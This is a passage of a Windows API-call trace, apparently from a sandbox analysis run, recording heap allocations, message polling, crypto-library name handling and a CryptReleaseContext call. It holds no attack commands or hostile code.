[0228.689] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0228.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0228.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0228.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0228.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0228.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0228.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0228.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0228.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0228.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0228.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0228.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0228.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0228.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0228.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0228.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0228.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0228.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0228.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0228.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0228.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0228.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0228.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0228.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0228.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0228.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0228.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0228.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0228.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0228.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0228.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0228.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0228.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0228.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0228.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0228.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0228.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0228.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0228.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0228.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0228.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0228.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0228.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0228.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0228.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0228.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0228.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0228.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0228.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0228.691] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0228.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0228.691] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0228.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f788 | out: hHeap=0x970000) returned 1 [0228.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0228.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d58 [0228.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0228.692] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0228.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0228.692] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0228.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x970000) returned 1 [0228.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0228.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ea8 [0228.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0228.692] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0228.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0228.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0228.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0228.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0228.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0228.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0228.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0228.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0228.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0228.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0228.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0228.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0228.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f68 [0228.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0228.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0228.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0228.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0228.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0228.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0228.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0228.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0228.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0228.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0228.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0228.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0228.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0228.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0228.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0228.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0228.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0228.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0228.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0228.693] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0228.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0228.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0228.693] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0228.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042d8 [0228.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0228.693] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0228.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042d8 | out: hHeap=0x970000) returned 1 [0228.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0228.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d70 [0228.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0228.694] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0228.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0228.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0228.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0228.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0228.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0228.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0228.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0228.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0228.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0228.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0228.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0228.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0228.694] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0228.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0228.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0228.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0228.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0228.694] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0228.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0228.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0228.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d70 [0228.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0228.695] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0228.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0228.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0228.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0228.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0228.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0228.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0228.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0228.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0228.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0228.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0228.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0228.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0228.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0228.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0228.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0228.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0228.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0228.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0228.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0228.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0228.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0228.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0228.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0228.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0228.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0228.696] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0228.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f788 | out: hHeap=0x970000) returned 1 [0228.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0228.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0228.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0228.696] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0228.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0228.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0228.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0228.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0228.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0228.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0228.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0228.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0228.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0228.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0228.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0228.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0228.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0228.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0228.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0228.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0228.697] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0228.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0228.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0228.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0228.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0228.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0228.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0228.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0228.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0228.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0228.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0228.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0228.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0228.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0228.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0228.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0228.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0228.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0228.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0228.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0228.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0228.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0228.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0228.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0228.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0228.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0228.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0228.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0228.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0228.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0228.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0228.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0228.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e699a8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0228.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0228.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0228.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0228.698] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0228.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0228.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0228.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0228.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0228.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0228.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0228.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0228.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0228.699] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0228.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0228.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0228.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0228.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0228.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0228.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0228.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0228.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0228.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0228.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: 